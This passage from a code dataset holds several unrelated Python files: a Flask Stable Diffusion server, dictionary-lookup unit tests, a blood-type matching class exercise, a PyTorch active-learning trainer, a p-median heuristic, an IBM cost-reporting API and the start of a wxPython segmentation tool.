500\n\n@app.route('/post_json', methods=['POST'])\ndef process_json():\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json = request.json\n return json\n else:\n return 'Content-Type not supported!'\n \n\"\"\"\nfor slack slash command\n\"\"\"\n@app.route('/make_image', methods=['POST'])\ndef make_image(): \n content_type = request.headers.get('Content-Type')\n if (content_type != 'application/json'):\n return jsonify({'message': 'set content_type json'}), 400\n\n prompt = request.json['text']\n if prompt is None:\n return jsonify({'message': 'prompt must set'}), 400\n \n if 'sd' not in request.environ.keys():\n return jsonify({'message': 'sd not set...'}), 500\n sd = request.environ['sd']\n\n try: \n sd = request.environ['sd'] \n predict_images = sd.predict(prompt)\n if predict_images == \"dummy\":\n return jsonify({ 'message': 'ok, use dummy' }) \n for img in predict_images:\n b = img_to_byte(img)\n msg = \"crate prompt is {}\".format(prompt)\n r = send_file(msg, b)\n app.logger.info('send slack result: %s', r)\n return jsonify({ 'message': 'ok' })\n except Exception as e:\n app.logger.info('exception %s', e)\n return jsonify({'message': 'server error'}), 500\n\ndef run(host, port, isDev): \n app.logger.info('run.. {}:{}'.format(host, port))\n if isDev:\n # app.run(host, port, debug=args.verbose)\n app.run(host, port, debug=True) \n else: \n app.logger.info('run as prod')\n serve(app, host=host, port=port, threads=10, url_scheme='http')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=5000)\n parser.add_argument('--host', default='127.0.0.1')\n parser.add_argument('-v', '--verbose', action='store_true')\n parser.add_argument('--dev', action='store_true')\n\n parser.add_argument('-s', '--num_inference_steps', default=50, type=int)\n parser.add_argument('-n', '--num_images_per_prompt', default=1, type=int)\n parser.add_argument('--use_dummy', action='store_true', help='use dummy stable diffusion')\n parser.add_argument('--device', default=None, help='torch run device. 
default cpu')\n\n args = parser.parse_args()\n\n if args.use_dummy:\n sd = Dummy()\n else: \n sd = StableDiffusion(img_size=64,\n num_inference_steps = args.num_inference_steps, \n num_images_per_prompt= args.num_images_per_prompt\n ) \n app.wsgi_app = InitModelMiddlewere(app.wsgi_app, sd) \n app.logger.setLevel(logging.INFO)\n run(args.host, args.port, args.dev)\n # socketio.run(app, debug=True)","repo_name":"if001/stable_diffusion_api","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"69925746142","text":"import os\nimport tempfile\nimport unittest\n\nimport simplejson\nfrom six import iteritems\n\nimport neahtta\n\n\nclass YamlTests(object):\n\n yaml_file = ''\n\n @property\n def parsed_yaml(self):\n import yaml\n if hasattr(self, '_parsed_yaml'):\n return self._parsed_yaml\n with open(self.yaml_file, 'r') as F:\n _raw_str = F.read()\n try:\n _raw = _raw_str.decode(\"utf-8\")\n except AttributeError:\n _raw = _raw_str\n _p = yaml.load(_raw, yaml.Loader)\n self._parsed_yaml = _p\n return self._parsed_yaml\n\n @property\n def wordforms_that_shouldnt_fail(self):\n def parse_item(i):\n return ((i[0], i[1]), i[2])\n\n return list(map(parse_item, self.parsed_yaml.get('LookupTests')))\n\n @property\n def paradigm_generation_tests(self):\n if hasattr(self, '_paradigm_generation_tests'):\n return self._paradigm_generation_tests\n\n _tests = []\n\n def read_test_item(i):\n _fst = i.get('lexicon')[0]\n _snd = i.get('lexicon')[1]\n _thrd = i.get('search')\n _frth = i.get('fail_message')\n\n for t, vs in iteritems(i.get('test')):\n if t == 'form_doesnt_contain':\n test_func = form_doesnt_contain\n if t == 'form_contains':\n test_func = form_contains\n _fth = test_func(set(vs))\n\n return (_fst, _snd, _thrd, _frth, _fth)\n else:\n return ()\n\n self._paradigm_generation_tests = list(map(\n read_test_item, self.parsed_yaml.get('ParadigmGeneration')))\n\n return self._paradigm_generation_tests\n\n\ndef form_contains(_test_set):\n \"\"\" A function that wraps a set, and then tests that the paradigm\n generation output partially intersects. \"\"\"\n\n def test_contains(paradigm):\n \"\"\"\n [\n [\"roa\\u0111\\u0111i\", [\"N\", \"Sg\", \"Gen\"], [\"roa\\u0111i\"]],\n [\"roa\\u0111\\u0111i\", [\"N\", \"Sg\", \"Ill\"], [\"roa\\u0111\\u0111\\u00e1i\"]],\n [\"roa\\u0111\\u0111i\", [\"N\", \"Pl\", \"Ill\"], [\"ro\\u0111iide\"]]\n ]\n \"\"\"\n forms = set(\n second_list[0]\n for first_list in paradigm\n for second_list in first_list\n )\n if not bool(forms & _test_set):\n print(78, 'failed', u' '.join(forms), u' '.join(_test_set))\n return bool(forms & _test_set)\n\n return test_contains\n\n\ndef form_doesnt_contain(_test_set):\n \"\"\" A function that wraps a set, and then tests that the paradigm\n generation output does not intersect it. 
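For example, form_doesnt_contain({u'foo'})(paradigm) is False whenever\n u'foo' occurs among the generated forms. 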
\"\"\"\n\n def test_doesnt_contain(paradigm):\n \"\"\"\n paradigm = [\n [\"roa\\u0111\\u0111i\", [\"N\", \"Sg\", \"Gen\"], [\"roa\\u0111i\"]],\n [\"roa\\u0111\\u0111i\", [\"N\", \"Sg\", \"Ill\"], [\"roa\\u0111\\u0111\\u00e1i\"]],\n [\"roa\\u0111\\u0111i\", [\"N\", \"Pl\", \"Ill\"], [\"ro\\u0111iide\"]]\n ]\n \"\"\"\n forms = set(\n second_list[0]\n for first_list in paradigm\n for second_list in first_list\n )\n if _test_set & forms:\n print(101, 'failed', u' '.join(forms), u' '.join(_test_set))\n return len(_test_set & forms) == 0\n\n return test_doesnt_contain\n\n\nclass WordLookupTests(unittest.TestCase):\n def setUp(self):\n _app = neahtta.app\n # Turn on debug to disable SMTP logging\n _app.debug = True\n _app.logger.removeHandler(_app.logger.smtp_handler)\n\n # Disable caching\n _app.caching_enabled = False\n self.app = _app.test_client()\n self.current_app = _app\n\n if self.current_app.config.fcgi_script_path:\n self.url_base = self.current_app.config.fcgi_script_path\n else:\n self.url_base = ''\n\n\nclass BasicTests(WordLookupTests):\n def test_api_null_lookup(self):\n \"\"\" Test that a null lookup to the api doesn't return a 500\n \"\"\"\n url = self.url_base + \"/lookup/sme/nob/?callback=jQuery3094203984029384&lookup=&lemmatize=true\"\n\n rv = self.app.get(url)\n self.assertEqual(rv.status_code, 200)\n\n def test_api_lookup(self):\n \"\"\" Test that a null lookup to the api doesn't return a 500\n \"\"\"\n url = self.url_base + \"/lookup/sme/nob/?callback=jQuery3094203984029384&lookup=mannat&lemmatize=true\"\n\n rv = self.app.get(url)\n self.assertEqual(rv.status_code, 200)\n\n def test_all_words_for_no_404s(self):\n for lang_pair, form in self.wordforms_that_shouldnt_fail[1::]:\n print(\"testing: %s / %s\" % (repr(lang_pair), repr(form)))\n base = '/%s/%s/' % lang_pair\n rv = self.app.post(\n base, data={\n 'lookup': form,\n })\n\n self.assertEqual(rv.status_code, 200)\n\n\nclass WordLookupDetailTests(WordLookupTests):\n def test_all_words_for_no_404s(self):\n for lang_pair, form in self.wordforms_that_shouldnt_fail[1::]:\n _from, _to = lang_pair\n base = '/detail/%s/%s/%s.html' % (_from, _to, form)\n print(\"testing: %s \" % base)\n rv = self.app.get(base)\n\n self.assertEqual(rv.status_code, 200)\n\n\nclass WordLookupAPITests(WordLookupTests):\n def test_all_words_for_no_404s(self):\n from urllib import urlencode\n for lang_pair, form in self.wordforms_that_shouldnt_fail[1::]:\n _from, _to = lang_pair\n base = self.url_base + u'/lookup/%s/%s/?' 
% (_from, _to)\n url = base + urlencode({'lookup': form.encode('utf-8')})\n print(\"testing: %s \" % url)\n rv = self.app.get(url)\n print(\" got: %d bytes\" % len(rv.data))\n\n self.assertEqual(rv.status_code, 200)\n\n\nclass ParadigmGenerationTests(WordLookupTests):\n def test_all_words_for_no_404s(self):\n for (source, target, lemma, error_msg,\n test_func) in self.paradigm_generation_tests:\n base = self.url_base + '/paradigm/%s/%s/%s/' % (\n source,\n target,\n lemma,\n )\n print(\"testing: %s \" % base)\n rv = self.app.get(base)\n result = simplejson.loads(rv.data)\n\n if result['input']['lemma'] == lemma:\n print('paradigm')\n test_result = test_func(result['paradigms'])\n self.assertTrue(test_result)\n\n # self.assertEqual(rv.status_code, 200)\n","repo_name":"giellatekno/neahttadigisanit","sub_path":"src/neahtta/tests/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":6491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"12867614133","text":"import requests\n\n\ndef main():\n \"\"\"\n Get the dict that contains the donor and recipient id and post the match\n result to the server\n \"\"\"\n r = requests.get('http://vcm-7631.vm.duke.edu:5002/get_patients/jl922')\n\n if r.status_code == 200:\n returned_dict = r.json()\n # print(returned_dict)\n\n \"\"\"\n Obtain the blood_type_dict by person's id\n \"\"\"\n blood_type_dict = {}\n for person_type, id in returned_dict.items():\n r = requests.get('http://vcm-7631.vm.duke.edu:5002/get_blood_type'\n '/{}'.format(id))\n\n if r.status_code == 200:\n blood_type_dict[person_type] = {'id': id, 'blood_type': r.text}\n\n print(blood_type_dict)\n\n \"\"\"\n Judge whether it's a match for blood_type between donor and recipient\n \"\"\"\n blood_match = ''\n if blood_type_dict['Donor']['blood_type'] == \\\n blood_type_dict['Recipient']['blood_type']:\n blood_match = 'Yes'\n else:\n blood_match = 'No'\n\n \"\"\"\n Send out a POST request to see whether your judgement on the\n blood_type match is Correct or Incorrect\n \"\"\"\n post_dict = {'Name': 'jl922', 'Match': blood_match}\n r = requests.post('http://vcm-7631.vm.duke.edu:5002/match_check',\n json=post_dict)\n if r.status_code == 200:\n print(r.text)\n\n return 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"junqilu/Classwork_Fall2022","sub_path":"blood_match.py","file_name":"blood_match.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6780582553","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom collections import Counter\n\n\nclass Training:\n def __init__(self, X, Y, X_te, Y_te, net, handler, args):\n \"\"\"\n\n \"\"\"\n self.X = X\n self.Y = Y\n self.X_te = X_te\n self.Y_te = Y_te\n #self.idxs_lb = idxs_lb\n self.net = net\n self.handler = handler\n self.args = args\n self.n_pool = len(Y)\n self.class_distribution = {}\n use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n def query(self, n):\n pass\n '''\n def update(self, idxs_lb):\n self.idxs_lb = idxs_lb\n '''\n def get_distribution(self):\n return self.class_distribution\n \n def _train(self, epoch, loader_tr, optimizer):\n self.clf.train()\n total_loss = 0\n for batch_idx, (x, y, idxs) in enumerate(loader_tr):\n \"\"\"\n print('_train x shape {}'.format(x.shape))\n print('_train y shape 
{}'.format(y.shape))\n \"\"\"\n x, y = x.to(self.device), y.to(self.device)\n optimizer.zero_grad()\n out, e1 = self.clf(x)\n # print('output shape {}'.format(out.shape))\n loss = F.cross_entropy(out, y)\n total_loss += loss.cpu().item()\n loss.backward()\n optimizer.step()\n \n return total_loss/len(loader_tr)\n \n def predict(self, X, Y):\n loader_te = DataLoader(self.handler(X, Y,\n transform=self.args['transform']['test']),\n shuffle=True, **self.args['loader_te_args'])\n self.clf.eval()\n total_loss = 0\n P = torch.zeros(len(Y), dtype=Y.dtype)\n with torch.no_grad():\n for x, y, idxs in loader_te:\n \"\"\"\n print('prediction x shape {}'.format(x.shape))\n print('prediction y shape {}'.format(y.shape))\n \"\"\"\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n loss = F.cross_entropy(out, y)\n total_loss += loss.cpu().item()\n pred = out.max(1)[1]\n if str(self.device) == 'cuda':\n P[idxs] = pred.cpu()\n else:\n P[idxs] = pred\n \n return P, total_loss/len(loader_te)\n\n def check_accuracy(self, X, Y):\n loader = DataLoader(self.handler(X, Y,\n transform=self.args['transform']['test']),\n shuffle=True, **self.args['loader_te_args'])\n self.clf.eval()\n num_correct, num_samples = 0, 0\n \n for x, y, idxs in loader:\n x, y = x.to(self.device), y.to(self.device)\n \n scores, e1 = self.clf(x)\n _, preds = scores.data.cpu().max(1)\n if str(self.device) == 'cuda':\n y = y.cpu()\n num_correct += (preds == y).sum()\n num_samples += x.size(0)\n \n # Return the fraction of datapoints that were correctly classified.\n acc = float(num_correct) / num_samples\n return acc \n \n def train(self):\n n_epoch = self.args['n_epoch']\n n_classes = self.args['n_classes']\n self.clf = self.net(n_classes=n_classes).to(self.device)\n #print(self.clf)\n if self.args['fc_only']:\n # for feature extraction using transfer learn\n print(\"feature extraction\")\n optimizer = optim.SGD(self.clf.fc.parameters(), **self.args['optimizer_args'])\n #optimizer = optim.Adam(self.clf.fc.parameters(), betas=(0.9,0.99), lr=0.00005)\n else:\n optimizer = optim.SGD(self.clf.parameters(), **self.args['optimizer_args'])\n \n # get training data index\n # make sure idxs gets updated prior to calling train\n #idxs_train = np.arange(self.n_pool)[self.idxs_lb]\n #print(\"training with {} datapoints\".format(sum(self.idxs_lb)))\n # compute distribution of labels\n all_y = self.Y\n self.class_distribution = dict(Counter(all_y.numpy()))\n loader_tr = DataLoader(self.handler(self.X,\n self.Y,\n transform=self.args['transform']['train']),\n shuffle=True,\n **self.args['loader_tr_args'])\n print(\"epoch\\ttrain_loss\\ttest_loss\\ttrain_acc\\ttest_acc\")\n for epoch in range(1, n_epoch+1):\n # print(\"epoch {}\".format(epoch))\n train_loss = self._train(epoch, loader_tr, optimizer)\n _, test_loss = self.predict(self.X_te, self.Y_te)\n \n train_acc = self.check_accuracy(self.X, self.Y)\n test_acc = self.check_accuracy(self.X_te, self.Y_te)\n print(\"{}\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\".format(epoch, round(train_loss, 4), round(test_loss, 4), \n round(train_acc, 6), round(test_acc, 6)))\n\n def sample_embeddings(self, q_idxs):\n # extract embeddings for samples indexed by q_idxs\n loader_sample = DataLoader(self.handler(self.X[q_idxs],\n self.Y[q_idxs],\n transform=self.args['transform']['test']),\n shuffle=True,\n **self.args['loader_sample_args'])\n # get embeddings\n self.clf.eval()\n emb = np.zeros((len(q_idxs), self.clf.get_embedding_dim()))\n with torch.no_grad():\n for x, y, idxs in loader_sample:\n x, y = 
x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n emb[idxs] = e1\n\n return emb\n\n def sample_images(self, q_idxs, n_images):\n # extract embeddings for these new samples\n sample_images = self.handler(self.X[q_idxs],\n self.Y[q_idxs])\n images = [x for x, y, idxs in sample_images if idxs < n_images]\n return images\n\n def predict_prob(self, X, Y):\n loader_te = DataLoader(self.handler(X, Y,\n transform=self.args['transform']['test']),\n shuffle=False, **self.args['loader_te_args'])\n self.clf.eval()\n # probs = torch.zeros([len(Y), len(np.unique(Y))])\n # corner case for caltech dataset, the remaining training data after multiple rounds\n # of active learning comes from less than 10 classes (class 6 for example, does not have\n # training data left to pick\n probs = torch.zeros([len(Y), self.args['n_classes']])\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n # get probabilities by computing softmax of the output\n prob = F.softmax(out, dim=1)\n if str(self.device) == 'cuda':\n # print(\"predict proba index {}\".format(idxs.shape))\n # print(\"predict proba prob shape {}\".format(prob.shape))\n # print(\"predict proba probs shape {}\".format(probs.shape))\n probs[idxs] = prob.cpu()\n else:\n probs[idxs] = prob\n\n return probs\n\n def predict_prob_dropout(self, X, Y, n_drop):\n # each n_drop is a mask\n # run multiple mask to estimate uncertainty\n loader_te = DataLoader(self.handler(X, Y,\n transform=self.args['transform']['test']),\n shuffle=False, **self.args['loader_te_args'])\n # set to train mode to get dropout masks\n self.clf.train()\n probs = torch.zeros([len(Y), self.args['n_classes']])\n for i in range(n_drop):\n print('n_drop {}/{}'.format(i+1, n_drop))\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n prob = F.softmax(out, dim=1)\n # add prob across n_drop\n if str(self.device) == 'cuda':\n probs[idxs] += prob.cpu()\n else: \n probs[idxs] += prob\n probs /= n_drop\n\n return probs\n \n def set_clf(self, path):\n # model trained on cpu, load to either CPU or GPU\n n_classes = self.args['n_classes']\n # self.clf = self.net(n_classes=n_classes).to(self.device)\n self.clf = self.net(n_classes=n_classes)\n print(\"loading model\")\n self.clf.load_state_dict(torch.load(path, map_location=self.device))\n self.clf.to(self.device)\n","repo_name":"nishamuktewar/data-replication","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":9103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9013694120","text":"\nimport zipfile\nimport os\nimport json\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\n\nbucket_name = 'randomfirstbucket'\ntrain_prefix = 'Input/train/'\nval_prefix = 'Input/val/'\ntrain_bucket_prefix = bucket_name + '/' + train_prefix \nval_bucket_prefix = bucket_name + '/' + val_prefix \n\nzipped_data = r'C:\\Users\\gad\\Desktop\\repos\\AI\\aws\\data\\dataset.zip'\ninput_data_dir = r'C:\\Users\\gad\\Desktop\\repos\\AI\\aws\\data\\input'\ntrain_dir = os.path.join(input_data_dir, 'train')\nsmall_train_dir = os.path.join(input_data_dir, 'small_train')\ntest_dir = os.path.join(input_data_dir, 'test')\nannotated_data_dir = r'C:\\Users\\gad\\Desktop\\repos\\AI\\aws\\data\\annotated'\nmanifest_file = r'C:\\Users\\gad\\Desktop\\repos\\AI\\aws\\data\\output.manifest'\n\n\ndef extract_files(src_file, dst_dir):\n 
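# Usage sketch with the module-level example paths defined above:\r\n # extract_files(zipped_data, input_data_dir)\r\n 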
with zipfile.ZipFile(src_file, 'r') as file :\n file.extractall(dst_dir)\n\n\ndef read_manifest(file):\n with open(file, 'r') as f :\n return f.read()\n\n\n\n\ndef create_bucket( bucket_name):\n\n s3_resource = boto3.resource('s3')\n response = s3_resource.create_bucket(Bucket = bucket_name)\n\n return response\n\ndef upload_file( bucket_name, file_name, dst_folder = None):\n s3_resource = boto3.resource('s3')\n \n obj = s3_resource.Bucket(bucket_name).Object('Input')\n status = obj.upload_file(Filename = file_name)\n return status\n\ndef create_dir(bucket_name, dir_name):\n if dir_name[-1] != '/' :\n dir_name += '/'\n s3_resource = boto3.resource('s3')\n bucket = s3_resource.Bucket(bucket_name)\n status = bucket.new_key(dir_name)\n return status\n\ndef get_contents(bucket):\n s3 = boto3.client('s3')\n bucket = s3.list_objects(Bucket = bucket_name)\n contents = [file['Key'] for file in bucket['Contents']]\n return contents","repo_name":"gadm21/AI","sub_path":"aws/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70403181342","text":"import numpy as np\nfrom utils import get_cost, load_csv, plot_solution, print_output, compare_solutions\nimport time\nfrom neighbourhood_search import run_neighbourhood_search\n'''\nA naive algorithm for finding a solution to an uncapacitated p-median problem\nPlaces stations in the cities with the lowest average distance from all other cities\n '''\ndef lowest_avg(cities, num_stations):\n\taverages = {}\n\t# find each cities average distance to all other cities\n\tfor i, city in enumerate(cities):\n\t\tcity_avg = np.average(city)\n\t\taverages[i] = city_avg\n\t# sort the averages\n\tsorted_averages = {key: val for key, val in sorted(\n\t\taverages.items(), key=lambda ele: ele[1], reverse=False)}\n\t# retrieve the top num_stations cities\n\tbest = list(sorted_averages.keys())[:num_stations]\n\t# assign stations to each city which was identified with the lowest average distance\n\tsol = [1 if x in best else 0 for x in averages.keys()]\n\n\tbest_cost = get_cost(sol, cities)\n\treturn sol, best_cost\n\nif __name__ == \"__main__\":\n\tcities = load_csv(\"./data/500_cities.csv\")\n\tnum_stations = 100\n\tstart = time.time()\n\tsolution, best_cost = lowest_avg(cities, num_stations)\n\tend = time.time() - start\n\tprint_output(\"Lowest Average\", end, best_cost, len(cities), num_stations)\n\t# plot_solution(solution, cities)\n\tn_sol, n_cost = run_neighbourhood_search(solution, cities)\n\tend = time.time() - start\n\tprint_output(\"Lowest Average Neighbourhood Search\", end, n_cost, len(cities), num_stations)\n\n\tsolutions = [solution, n_sol]\n\tnames = [f\"Lowest Average - {best_cost}\", f\"Lowest Average Neighbourhood Search - {n_cost}\"]\n\tcompare_solutions(solutions, names, cities)\n\t# plot_solution(n_sol, cities)\n\t\n\n\n\n\n\n\n\n","repo_name":"afestein/sit316-project","sub_path":"lowest_average_distance.py","file_name":"lowest_average_distance.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41076420275","text":"import json\nimport logging\n\nfrom apiflask import APIBlueprint, input\nfrom sqlalchemy import and_, extract, func\n\nfrom ibm.auth import authenticate, Response\nfrom ibm.common.consts import INT_MONTH_TO_STR, MONTHS_STR_TO_INT\nfrom ibm.common.utils import get_month_interval\nfrom ibm.models import 
IBMCloud, IBMCost, IBMResourceInstancesCost, IBMIdleResource, IBMResourceControllerData, \\\n IBMResourceTracking, IBMRightSizingRecommendation\nfrom ibm.web import db as ibmdb\nfrom .schemas import IBMCostReportingQuerySchema\n\nLOGGER = logging.getLogger(__name__)\n\nibm_reporting = APIBlueprint('ibm_reporting', __name__, tag=\"IBM Reporting\")\n\n\n@ibm_reporting.route('/cost_reporting', methods=['GET'])\n@authenticate\n@input(IBMCostReportingQuerySchema, location='query')\ndef get_ibm_cloud_report(cloud_query_params, user):\n \"\"\"\n Get IBM Cloud Cost Report\n \"\"\"\n cloud_id = cloud_query_params.get(\"cloud_id\")\n month = cloud_query_params.get(\"month\")\n\n if cloud_id:\n cloud = ibmdb.session.query(IBMCloud).filter_by(user_id=user[\"id\"], id=cloud_id).first()\n else:\n cloud = ibmdb.session.query(IBMCloud).filter_by(user_id=user[\"id\"]).all()\n if not cloud:\n LOGGER.info(f\"No IBM Cloud accounts found for user with ID {user['id']}\")\n return Response(status=404)\n\n if month and month.lower() not in MONTHS_STR_TO_INT.keys():\n return Response(status=400)\n\n start, end = get_month_interval(month)\n month = start.month\n year = start.year\n\n cost_obj = ibmdb.session.query(IBMCost).filter_by(cloud_id=cloud_id, billing_month=start).first()\n if not cost_obj:\n LOGGER.info(f\"No IBM Cloud Cost with ID {cloud_id} not found\")\n return Response(status=204)\n\n resource_instances_cost_crns_sq = \\\n ibmdb.session.query(IBMResourceInstancesCost.crn).filter_by(cost_id=cost_obj.id).subquery()\n\n idle_resource_saving = ibmdb.session.query(func.sum(IBMIdleResource.estimated_savings).label(\n 'idle_resource_saving')).filter(and_(extract('month', IBMIdleResource.created_at) == month,\n extract('year', IBMIdleResource.created_at) == year)).filter_by(\n cloud_id=cloud_id).all()\n\n right_sizing_saving = ibmdb.session.query(func.sum(IBMRightSizingRecommendation.estimated_monthly_savings).label(\n 'right_sizing_saving')).filter_by(cloud_id=cloud_id).filter(\n and_(extract('month', IBMRightSizingRecommendation.created_at) == month,\n extract('year', IBMRightSizingRecommendation.created_at) == year)).filter_by(\n cloud_id=cloud_id).all()\n\n savings_achieved = ibmdb.session.query(\n func.sum(IBMResourceTracking.estimated_savings).label(\"estimated_savings\")).filter(\n and_(extract('month', IBMResourceTracking.action_taken_at) == month,\n extract('year', IBMResourceTracking.action_taken_at) == year)).filter_by(cloud_id=cloud_id).all()\n\n idle_resource_saving = idle_resource_saving[0][0] if idle_resource_saving[0][0] else 0.0\n right_sizing_saving = right_sizing_saving[0][0] if right_sizing_saving[0][0] else 0.0\n savings_achieved = savings_achieved[0][0] if savings_achieved[0][0] else 0.0\n savings = idle_resource_saving + right_sizing_saving\n\n ibm_resources_created_this_month_json = []\n ibm_resources_deleted_this_month_json = []\n older_resources_costed_this_month_json = []\n ibm_resources = ibmdb.session.query(IBMResourceControllerData).filter_by(cloud_id=cloud_id).\\\n filter(IBMResourceControllerData.crn.in_(resource_instances_cost_crns_sq)).all()\n for ibm_resource in ibm_resources:\n if ibm_resource.created_at and ibm_resource.created_at > start and ibm_resource.created_at < end:\n ibm_resources_created_this_month_json.append(ibm_resource.to_reporting_json(month=start))\n elif ibm_resource.deleted_at and ibm_resource.deleted_at > start and ibm_resource.deleted_at < end:\n ibm_resources_deleted_this_month_json.append(ibm_resource.to_reporting_json(month=start))\n else:\n 
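# Neither created nor deleted within [start, end): an older resource that\n # still accrued cost this billing month.\n 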
older_resources_costed_this_month_json.append(ibm_resource.to_reporting_json(month=start))\n\n right_sizing_recommendation_count = ibmdb.session.query(IBMRightSizingRecommendation).filter(\n and_(extract('month', IBMRightSizingRecommendation.created_at) == month,\n extract('year', IBMRightSizingRecommendation.created_at) == year)).filter_by(\n cloud_id=cloud_id).count() or 0\n\n idle_resource_recommendation_count = ibmdb.session.query(IBMIdleResource).filter(\n and_(extract('month', IBMIdleResource.created_at) == month,\n extract('year', IBMIdleResource.created_at) == year)).filter_by(cloud_id=cloud_id).count() or 0\n\n total_recommendation_generated = right_sizing_recommendation_count + idle_resource_recommendation_count\n\n actions_taken_at = ibmdb.session.query(IBMResourceTracking).filter(\n and_(extract('month', IBMResourceTracking.action_taken_at) == month,\n extract('year', IBMResourceTracking.action_taken_at) == year)).filter_by(cloud_id=cloud_id).count()\n\n cost_report_json = {\n \"summary\": {\n \"cloud_id\": cloud_id,\n \"name\": cloud.name,\n \"month\": INT_MONTH_TO_STR[month],\n \"recommendations\": {\n \"total_recommendations\": total_recommendation_generated,\n \"action_taken\": actions_taken_at,\n \"actions_pending\": total_recommendation_generated-actions_taken_at,\n \"cost\": cost_obj.billable_cost,\n \"realized_savings\": savings,\n \"potential_savings\": savings - savings_achieved,\n },\n },\n \"details\": {\n \"resources_created_this_month\": ibm_resources_created_this_month_json,\n \"resources_deleted_this_month\": ibm_resources_deleted_this_month_json,\n \"older_resources\": older_resources_costed_this_month_json\n }\n }\n\n return Response(json.dumps(cost_report_json), status=200, mimetype=\"application/json\")\n","repo_name":"talha927/cloud-ibm-test","sub_path":"ibm/web/ibm/cost_reporting/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36735602160","text":"# -*- coding: utf-8 -*-\r\n\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nimport pickle\r\nimport sys\r\nimport time\r\nimport threading\r\nimport json\r\n\r\nimport wx\r\nimport wx.xrc\r\n\r\n\"\"\"\r\nids\r\n76,77 - left/right\r\n78 - slider slice\r\n79 - num slice combo box\r\n80 - erase\r\n81 - remove last vertex\r\n82 - contrast slider\r\n83 - save all\r\n84 - save current polygon/contour\r\n85 - contour drawing style\r\n86 - brush drawing style\r\n87 - brush size\r\n88 - view axis\r\n89 - delete brush\r\n90-xxx classes\r\n201 - send to back\r\n202 - undo last polygon\r\n203 - select previous polygon\r\n204 - select next polygon\r\n205 - back to segmentation\r\n206 - change class dropdown\r\n207 - change class button\r\n208 - Previous\r\n209 - Next\r\n210 - Hide segmentation\r\n\"\"\"\r\n\r\n# global vars\r\nSEG_PATH_IN = ''\r\nSEG_PATH_OUT = ''\r\nFILE_PATH = []\r\nPREV_FILE_PATH = []\r\nIMAGE_WIDTH = 0\r\nIMAGE_HEIGHT = 0\r\nIMAGE_EXTENSION = ''\r\nNUM_SLICES = 0\r\ncurrent_image = []\r\nimage_np_all_slices = []\r\nimage_np_all_slices_normed = []\r\nimage_np_all_slices_segmentation = []\r\nimage_np_all_slices_normed_plot = []\r\nimage_np_all_slices_segmentation_plot = []\r\npolygons = []\r\npolygons_to_be_deleted = []\r\ncurrent_polygon_to_be_deleted_idx = 0\r\nnum_polygons = 0\r\nold_area_list = []\r\ncurrent_operation = []\r\noperation_changed = True\r\n\r\nSTART_BUTTON_ID_CLASSES = 90\r\n\r\nFIRST_CLICK = False\r\n\r\nHIDE_SEGMENTATION = 
False\r\n\r\nimage_previous_segmentation_overlaid = []\r\n\r\ntry:\r\n strings = json.load(open(\"languageConfig.yaml\"))\r\nexcept:\r\n pass\r\n\r\ndef _(s):\r\n try:\r\n return strings[s]\r\n except Exception as e:\r\n return s\r\n\r\ntry:\r\n classConfigLines = open(\"classConfig.yaml\").read().splitlines()\r\nexcept Exception as e:\r\n print('No/corruped classConfig.yaml file. Correct format: {className} {R} {G} {B} , where R,G,B range from 0..255')\r\n app = wx.App(None)\r\n style = wx.OK\r\n dialog = wx.MessageDialog(None, 'Missing/corrupted classConfig.yaml file. Correct format: {className} {R} {G} {B} , where R,G,B range from 0..255', 'Error', style)\r\n dialogResult = dialog.ShowModal()\r\n dialog.destroy()\r\n sys.exit(1)\r\n #dialog.SetYesNoCancelLabels(_(\"Segment image\"), _(\"Edit segmented image\"), _(\"Cancel\"))\r\n\r\n\r\nCLASS_NAMES = []\r\nCLASS_COLORS_RGB = []\r\n\r\nfor line in classConfigLines:\r\n x=line.split(' ')\r\n CLASS_NAMES.append(x[0])\r\n CLASS_COLORS_RGB.append((int(x[1]), int(x[2]), int(x[3])))\r\n\r\n\r\noperations_list = ['segment', 'edit']\r\n\r\noperations_list_translated = [_('segment'), _('edit')]\r\n\r\nBORDER_PADDING = 70\r\n\r\nNUM_CLASSES = len(CLASS_NAMES)\r\n\r\n\r\n# helpers / GUI\r\n\r\ndef selectOperation():\r\n # style = wx.YES_NO | wx.ICON_QUESTION | wx.CANCEL | wx.HELP\r\n style = wx.YES_NO | wx.ICON_QUESTION | wx.CANCEL\r\n dialog = wx.MessageDialog(None, _('Select operation'), _('Image segmentation'), style)\r\n\r\n # argh, wx 2.9+ :/\r\n try:\r\n dialog.SetYesNoCancelLabels(_(\"Segment image\"), _(\"Edit segmented image\"), 